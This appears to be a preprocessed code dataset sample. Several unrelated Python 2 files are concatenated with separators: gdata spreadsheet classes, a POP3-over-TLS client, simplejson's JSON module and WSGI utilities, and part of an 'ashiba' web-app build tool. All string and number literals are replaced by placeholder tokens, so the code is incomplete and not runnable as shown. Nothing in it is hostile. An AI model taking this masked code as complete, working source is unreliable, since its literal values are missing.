new_custom . _HarvestElementTree ( element_tree ) <EOL> new_custom . column = local_tag <EOL> return new_custom <EOL> return None <EOL> class SpreadsheetsSpreadsheet ( gdata . GDataEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataEntry . _children . copy ( ) <EOL> _attributes = gdata . GDataEntry . _attributes . copy ( ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> text = None , extension_elements = None , extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . updated = updated <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def SpreadsheetsSpreadsheetFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsSpreadsheet , <EOL> xml_string ) <EOL> class SpreadsheetsWorksheet ( gdata . GDataEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataEntry . _children . copy ( ) <EOL> _attributes = gdata . GDataEntry . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> RowCount ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> ColCount ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> row_count = None , col_count = None , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . updated = updated <EOL> self . row_count = row_count <EOL> self . col_count = col_count <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def SpreadsheetsWorksheetFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsWorksheet , <EOL> xml_string ) <EOL> class SpreadsheetsCell ( gdata . BatchEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . BatchEntry . _children . copy ( ) <EOL> _attributes = gdata . BatchEntry . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , Cell ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> cell = None , batch_operation = None , batch_id = None , batch_status = None , <EOL> text = None , extension_elements = None , extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . batch_operation = batch_operation <EOL> self . batch_id = batch_id <EOL> self . batch_status = batch_status <EOL> self . updated = updated <EOL> self . cell = cell <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def SpreadsheetsCellFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsCell , <EOL> xml_string ) <EOL> class SpreadsheetsList ( gdata . GDataEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataEntry . _children . copy ( ) <EOL> _attributes = gdata . GDataEntry . _attributes . copy ( ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> custom = None , <EOL> text = None , extension_elements = None , extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . updated = updated <EOL> self . custom = custom or { } <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def _ConvertElementTreeToMember ( self , child_tree ) : <EOL> if self . __class__ . _children . has_key ( child_tree . tag ) : <EOL> member_name = self . __class__ . _children [ child_tree . tag ] [ <NUM_LIT:0> ] <EOL> member_class = self . __class__ . _children [ child_tree . tag ] [ <NUM_LIT:1> ] <EOL> if isinstance ( member_class , list ) : <EOL> if getattr ( self , member_name ) is None : <EOL> setattr ( self , member_name , [ ] ) <EOL> getattr ( self , member_name ) . append ( atom . _CreateClassFromElementTree ( <EOL> member_class [ <NUM_LIT:0> ] , child_tree ) ) <EOL> else : <EOL> setattr ( self , member_name , <EOL> atom . _CreateClassFromElementTree ( member_class , child_tree ) ) <EOL> elif child_tree . tag . find ( '<STR_LIT>' % GSPREADSHEETS_EXTENDED_NAMESPACE ) == <NUM_LIT:0> : <EOL> name = child_tree . tag [ child_tree . tag . index ( '<STR_LIT:}>' ) + <NUM_LIT:1> : ] <EOL> custom = _CustomFromElementTree ( child_tree ) <EOL> if custom : <EOL> self . custom [ name ] = custom <EOL> else : <EOL> ExtensionContainer . _ConvertElementTreeToMember ( self , child_tree ) <EOL> def _AddMembersToElementTree ( self , tree ) : <EOL> member_node_names = [ values [ <NUM_LIT:0> ] for tag , values in <EOL> self . __class__ . _children . iteritems ( ) ] <EOL> for member_name in member_node_names : <EOL> member = getattr ( self , member_name ) <EOL> if member is None : <EOL> pass <EOL> elif isinstance ( member , list ) : <EOL> for instance in member : <EOL> instance . _BecomeChildElement ( tree ) <EOL> else : <EOL> member . _BecomeChildElement ( tree ) <EOL> for xml_attribute , member_name in self . __class__ . _attributes . iteritems ( ) : <EOL> member = getattr ( self , member_name ) <EOL> if member is not None : <EOL> tree . attrib [ xml_attribute ] = member <EOL> for name , custom in self . custom . iteritems ( ) : <EOL> custom . _BecomeChildElement ( tree ) <EOL> atom . ExtensionContainer . _AddMembersToElementTree ( self , tree ) <EOL> def SpreadsheetsListFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsList , <EOL> xml_string ) <EOL> element_tree = ElementTree . fromstring ( xml_string ) <EOL> return _SpreadsheetsListFromElementTree ( element_tree ) <EOL> class SpreadsheetsSpreadsheetsFeed ( gdata . GDataFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataFeed . _children . copy ( ) <EOL> _attributes = gdata . GDataFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsSpreadsheet ] ) <EOL> def SpreadsheetsSpreadsheetsFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsSpreadsheetsFeed , <EOL> xml_string ) <EOL> class SpreadsheetsWorksheetsFeed ( gdata . GDataFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataFeed . _children . copy ( ) <EOL> _attributes = gdata . GDataFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsWorksheet ] ) <EOL> def SpreadsheetsWorksheetsFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsWorksheetsFeed , <EOL> xml_string ) <EOL> class SpreadsheetsCellsFeed ( gdata . BatchFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . BatchFeed . _children . copy ( ) <EOL> _attributes = gdata . BatchFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsCell ] ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> RowCount ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> ColCount ) <EOL> def __init__ ( self , author = None , category = None , contributor = None , <EOL> generator = None , icon = None , atom_id = None , link = None , logo = None , <EOL> rights = None , subtitle = None , title = None , updated = None , <EOL> entry = None , total_results = None , start_index = None , <EOL> items_per_page = None , extension_elements = None , <EOL> extension_attributes = None , text = None , row_count = None , <EOL> col_count = None , interrupted = None ) : <EOL> gdata . BatchFeed . __init__ ( self , author = author , category = category , <EOL> contributor = contributor , generator = generator , <EOL> icon = icon , atom_id = atom_id , link = link , <EOL> logo = logo , rights = rights , subtitle = subtitle , <EOL> title = title , updated = updated , entry = entry , <EOL> total_results = total_results , <EOL> start_index = start_index , <EOL> items_per_page = items_per_page , <EOL> extension_elements = extension_elements , <EOL> extension_attributes = extension_attributes , <EOL> text = text , interrupted = interrupted ) <EOL> self . row_count = row_count <EOL> self . col_count = col_count <EOL> def GetBatchLink ( self ) : <EOL> for link in self . link : <EOL> if link . rel == '<STR_LIT>' : <EOL> return link <EOL> return None <EOL> def SpreadsheetsCellsFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsCellsFeed , <EOL> xml_string ) <EOL> class SpreadsheetsListFeed ( gdata . GDataFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataFeed . _children . copy ( ) <EOL> _attributes = gdata . GDataFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsList ] ) <EOL> def SpreadsheetsListFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsListFeed , <EOL> xml_string ) </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> from poplib import POP3 <EOL> from gdata . tlslite . TLSConnection import TLSConnection <EOL> from gdata . tlslite . integration . ClientHelper import ClientHelper <EOL> POP3_TLS_PORT = <NUM_LIT> <EOL> class POP3_TLS ( POP3 , ClientHelper ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port = POP3_TLS_PORT , <EOL> username = None , password = None , sharedKey = None , <EOL> certChain = None , privateKey = None , <EOL> cryptoID = None , protocol = None , <EOL> x509Fingerprint = None , <EOL> x509TrustList = None , x509CommonName = None , <EOL> settings = None ) : <EOL> """<STR_LIT>""" <EOL> self . host = host <EOL> self . port = port <EOL> msg = "<STR_LIT>" <EOL> self . sock = None <EOL> for res in socket . getaddrinfo ( self . host , self . port , <NUM_LIT:0> , socket . SOCK_STREAM ) : <EOL> af , socktype , proto , canonname , sa = res <EOL> try : <EOL> self . sock = socket . socket ( af , socktype , proto ) <EOL> self . sock . connect ( sa ) <EOL> except socket . error , msg : <EOL> if self . sock : <EOL> self . sock . close ( ) <EOL> self . sock = None <EOL> continue <EOL> break <EOL> if not self . sock : <EOL> raise socket . error , msg <EOL> ClientHelper . __init__ ( self , <EOL> username , password , sharedKey , <EOL> certChain , privateKey , <EOL> cryptoID , protocol , <EOL> x509Fingerprint , <EOL> x509TrustList , x509CommonName , <EOL> settings ) <EOL> self . sock = TLSConnection ( self . sock ) <EOL> self . sock . closeSocket = True <EOL> ClientHelper . _handshake ( self , self . sock ) <EOL> self . file = self . sock . makefile ( '<STR_LIT:rb>' ) <EOL> self . _debugging = <NUM_LIT:0> <EOL> self . welcome = self . _getresp ( ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] </s>
<s> r"""<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> __author__ = '<STR_LIT>' <EOL> from decoder import JSONDecoder , JSONDecodeError <EOL> from encoder import JSONEncoder <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordered_dict import OrderedDict <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> ) <EOL> def dump ( obj , fp , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not kw ) : <EOL> iterable = _default_encoder . iterencode ( obj ) <EOL> else : <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> iterable = cls ( skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , <EOL> default = default , ** kw ) . iterencode ( obj ) <EOL> for chunk in iterable : <EOL> fp . write ( chunk ) <EOL> def dumps ( obj , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not kw ) : <EOL> return _default_encoder . encode ( obj ) <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> return cls ( <EOL> skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , default = default , <EOL> ** kw ) . encode ( obj ) <EOL> _default_decoder = JSONDecoder ( encoding = None , object_hook = None , <EOL> object_pairs_hook = None ) <EOL> def load ( fp , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return loads ( fp . read ( ) , <EOL> encoding = encoding , cls = cls , object_hook = object_hook , <EOL> parse_float = parse_float , parse_int = parse_int , <EOL> parse_constant = parse_constant , object_pairs_hook = object_pairs_hook , <EOL> ** kw ) <EOL> def loads ( s , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( cls is None and encoding is None and object_hook is None and <EOL> parse_int is None and parse_float is None and <EOL> parse_constant is None and object_pairs_hook is None and not kw ) : <EOL> return _default_decoder . decode ( s ) <EOL> if cls is None : <EOL> cls = JSONDecoder <EOL> if object_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_hook <EOL> if object_pairs_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_pairs_hook <EOL> if parse_float is not None : <EOL> kw [ '<STR_LIT>' ] = parse_float <EOL> if parse_int is not None : <EOL> kw [ '<STR_LIT>' ] = parse_int <EOL> if parse_constant is not None : <EOL> kw [ '<STR_LIT>' ] = parse_constant <EOL> return cls ( encoding = encoding , ** kw ) . decode ( s ) <EOL> def _toggle_speedups ( enabled ) : <EOL> import simplejson . decoder as dec <EOL> import simplejson . encoder as enc <EOL> import simplejson . scanner as scan <EOL> try : <EOL> from simplejson . _speedups import make_encoder as c_make_encoder <EOL> except ImportError : <EOL> c_make_encoder = None <EOL> if enabled : <EOL> dec . scanstring = dec . c_scanstring or dec . py_scanstring <EOL> enc . c_make_encoder = c_make_encoder <EOL> enc . encode_basestring_ascii = ( enc . c_encode_basestring_ascii or <EOL> enc . py_encode_basestring_ascii ) <EOL> scan . make_scanner = scan . c_make_scanner or scan . py_make_scanner <EOL> else : <EOL> dec . scanstring = dec . py_scanstring <EOL> enc . c_make_encoder = None <EOL> enc . encode_basestring_ascii = enc . py_encode_basestring_ascii <EOL> scan . make_scanner = scan . py_make_scanner <EOL> dec . make_scanner = scan . make_scanner <EOL> global _default_decoder <EOL> _default_decoder = JSONDecoder ( <EOL> encoding = None , <EOL> object_hook = None , <EOL> object_pairs_hook = None , <EOL> ) <EOL> global _default_encoder <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import posixpath <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> class FileWrapper : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filelike , blksize = <NUM_LIT> ) : <EOL> self . filelike = filelike <EOL> self . blksize = blksize <EOL> if hasattr ( filelike , '<STR_LIT>' ) : <EOL> self . close = filelike . close <EOL> def __getitem__ ( self , key ) : <EOL> data = self . filelike . read ( self . blksize ) <EOL> if data : <EOL> return data <EOL> raise IndexError <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> data = self . filelike . read ( self . blksize ) <EOL> if data : <EOL> return data <EOL> raise StopIteration <EOL> def guess_scheme ( environ ) : <EOL> """<STR_LIT>""" <EOL> if environ . get ( "<STR_LIT>" ) in ( '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:1>' ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT:http>' <EOL> def application_uri ( environ ) : <EOL> """<STR_LIT>""" <EOL> url = environ [ '<STR_LIT>' ] + '<STR_LIT>' <EOL> from urllib import quote <EOL> if environ . get ( '<STR_LIT>' ) : <EOL> url += environ [ '<STR_LIT>' ] <EOL> else : <EOL> url += environ [ '<STR_LIT>' ] <EOL> if environ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if environ [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> url += '<STR_LIT::>' + environ [ '<STR_LIT>' ] <EOL> else : <EOL> if environ [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> url += '<STR_LIT::>' + environ [ '<STR_LIT>' ] <EOL> url += quote ( environ . get ( '<STR_LIT>' ) or '<STR_LIT:/>' ) <EOL> return url <EOL> def request_uri ( environ , include_query = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> url = application_uri ( environ ) <EOL> from urllib import quote <EOL> path_info = quote ( environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if not environ . get ( '<STR_LIT>' ) : <EOL> url += path_info [ <NUM_LIT:1> : ] <EOL> else : <EOL> url += path_info <EOL> if include_query and environ . get ( '<STR_LIT>' ) : <EOL> url += '<STR_LIT:?>' + environ [ '<STR_LIT>' ] <EOL> return url <EOL> def shift_path_info ( environ ) : <EOL> """<STR_LIT>""" <EOL> path_info = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not path_info : <EOL> return None <EOL> path_parts = path_info . split ( '<STR_LIT:/>' ) <EOL> path_parts [ <NUM_LIT:1> : - <NUM_LIT:1> ] = [ p for p in path_parts [ <NUM_LIT:1> : - <NUM_LIT:1> ] if p and p < > '<STR_LIT:.>' ] <EOL> name = path_parts [ <NUM_LIT:1> ] <EOL> del path_parts [ <NUM_LIT:1> ] <EOL> script_name = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> script_name = posixpath . normpath ( script_name + '<STR_LIT:/>' + name ) <EOL> if script_name . endswith ( '<STR_LIT:/>' ) : <EOL> script_name = script_name [ : - <NUM_LIT:1> ] <EOL> if not name and not script_name . endswith ( '<STR_LIT:/>' ) : <EOL> script_name += '<STR_LIT:/>' <EOL> environ [ '<STR_LIT>' ] = script_name <EOL> environ [ '<STR_LIT>' ] = '<STR_LIT:/>' . join ( path_parts ) <EOL> if name == '<STR_LIT:.>' : <EOL> name = None <EOL> return name <EOL> def setup_testing_defaults ( environ ) : <EOL> """<STR_LIT>""" <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ . setdefault ( '<STR_LIT>' , environ [ '<STR_LIT>' ] ) <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT:GET>' ) <EOL> if '<STR_LIT>' not in environ and '<STR_LIT>' not in environ : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> environ . setdefault ( '<STR_LIT>' , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> environ . setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> environ . setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> environ . setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> from StringIO import StringIO <EOL> environ . setdefault ( '<STR_LIT>' , StringIO ( "<STR_LIT>" ) ) <EOL> environ . setdefault ( '<STR_LIT>' , StringIO ( ) ) <EOL> environ . setdefault ( '<STR_LIT>' , guess_scheme ( environ ) ) <EOL> if environ [ '<STR_LIT>' ] == '<STR_LIT:http>' : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif environ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _hoppish = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } . has_key <EOL> def is_hop_by_hop ( header_name ) : <EOL> """<STR_LIT>""" <EOL> return _hoppish ( header_name . lower ( ) ) </s>
<s> import re <EOL> import sys <EOL> import copy <EOL> import json <EOL> import time <EOL> import shutil <EOL> import urllib2 <EOL> import tempfile <EOL> import os , os . path <EOL> import multiprocessing as mp <EOL> from contextlib import closing , contextmanager <EOL> import webbrowser <EOL> import ashiba , ashiba . utils <EOL> ASHIBA_SHARE = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> print '<STR_LIT>' , ASHIBA_SHARE <EOL> @ contextmanager <EOL> def stay ( ) : <EOL> oldpath = sys . path <EOL> oldcwd = os . getcwd ( ) <EOL> yield <EOL> os . chdir ( oldcwd ) <EOL> sys . path = oldpath <EOL> def stay_put ( fcn ) : <EOL> def decorated_fcn ( * args , ** kwargs ) : <EOL> with stay ( ) : <EOL> return fcn ( * args , ** kwargs ) <EOL> return decorated_fcn <EOL> def get_mtimes ( path ) : <EOL> mtimes = { } <EOL> for root , dirs , files in os . walk ( path ) : <EOL> if os . path . join ( path , '<STR_LIT>' ) not in root : <EOL> for fname in files : <EOL> if not ( fname . startswith ( '<STR_LIT:.>' ) or fname . endswith ( '<STR_LIT>' ) ) : <EOL> fpath = os . path . join ( root , fname ) <EOL> mtimes [ fpath ] = os . path . getmtime ( fpath ) <EOL> return mtimes <EOL> def templatify_html ( in_file ) : <EOL> if isinstance ( in_file , file ) : <EOL> buf = in_file . read ( ) <EOL> else : <EOL> buf = in_file <EOL> for search_str in [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> if search_str not in buf : <EOL> buf = search_str + '<STR_LIT:\n>' + buf <EOL> search_str = '<STR_LIT>' <EOL> if search_str not in buf : <EOL> buf += '<STR_LIT:\n>' + search_str <EOL> return buf <EOL> @ stay_put <EOL> def _compile ( args ) : <EOL> path = args . path <EOL> os . chdir ( path ) <EOL> if os . getcwd ( ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import settings <EOL> SETTINGS = { k : v for k , v in vars ( settings ) . items ( ) if not k . startswith ( '<STR_LIT>' ) } <EOL> import handlers <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> elif os . path . isdir ( '<STR_LIT>' ) : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> shutil . copytree ( <EOL> os . path . join ( ASHIBA_SHARE , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> ENAML = False <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> compile_enaml ( '<STR_LIT>' ) <EOL> ENAML = True <EOL> for fname in [ x for x in os . listdir ( '<STR_LIT:.>' ) if not x . startswith ( '<STR_LIT:.>' ) ] : <EOL> root , ext = os . path . splitext ( fname ) <EOL> if ext in [ '<STR_LIT>' ] : <EOL> shutil . copy ( fname , os . path . join ( '<STR_LIT>' , fname ) ) <EOL> elif ext == '<STR_LIT>' : <EOL> if root != '<STR_LIT>' : <EOL> shutil . copy ( fname , os . path . join ( '<STR_LIT>' , '<STR_LIT>' , fname ) ) <EOL> elif not ENAML : <EOL> in_file = open ( fname ) <EOL> out_file = open ( os . path . join ( '<STR_LIT>' , '<STR_LIT>' , fname ) , '<STR_LIT:w>' ) <EOL> out_file . write ( templatify_html ( in_file ) ) <EOL> out_file . close ( ) <EOL> if os . path . isdir ( '<STR_LIT>' ) : <EOL> for item in [ os . path . join ( '<STR_LIT>' , x ) for x in os . listdir ( '<STR_LIT>' ) ] : <EOL> src , dst = item , os . path . join ( '<STR_LIT>' , item ) <EOL> if os . path . isdir ( item ) : <EOL> shutil . copytree ( src , dst ) <EOL> else : <EOL> shutil . copy ( src , dst ) <EOL> for item in SETTINGS . get ( '<STR_LIT>' , [ ] ) : <EOL> src , dst = item , os . path . join ( '<STR_LIT>' , item ) <EOL> try : <EOL> shutil . copy ( src , dst ) <EOL> except IOError : <EOL> print '<STR_LIT>' . format ( item ) <EOL> else : <EOL> print '<STR_LIT>' , item <EOL> file_path = os . path . join ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> print "<STR_LIT>" , os . path . abspath ( file_path ) <EOL> outfile = open ( file_path , '<STR_LIT:w>' ) <EOL> outfile . write ( "<STR_LIT>" . format ( ashiba . __version__ ) ) <EOL> outfile . write ( "<STR_LIT>" ) <EOL> fcn_names = [ k for k in vars ( handlers ) if re . match ( '<STR_LIT>' , k ) ] <EOL> for fcn_name in fcn_names : <EOL> print "<STR_LIT>" , fcn_name <EOL> name , event = fcn_name . rsplit ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> if name . startswith ( '<STR_LIT:_>' ) : <EOL> selector = '<STR_LIT:.>' <EOL> else : <EOL> selector = '<STR_LIT:#>' <EOL> jquery_string = """<STR_LIT>""" . format ( selector = selector , name = name . lstrip ( '<STR_LIT:_>' ) , event = event ) <EOL> outfile . write ( jquery_string ) <EOL> outfile . write ( "<STR_LIT>" ) <EOL> outfile . close ( ) <EOL> def _init ( args ) : <EOL> path = args . path <EOL> print "<STR_LIT>" , path <EOL> if os . path . exists ( path ) : <EOL> sys . exit ( "<STR_LIT>" . format ( <EOL> os . path . abspath ( path ) ) ) <EOL> shutil . copytree ( os . path . join ( ASHIBA_SHARE , '<STR_LIT>' ) , path ) <EOL> def _clean ( args ) : <EOL> for path in args . paths : <EOL> if os . path . isdir ( path ) : <EOL> clean_app_dir ( path ) <EOL> else : <EOL> print '<STR_LIT>' . format ( path ) 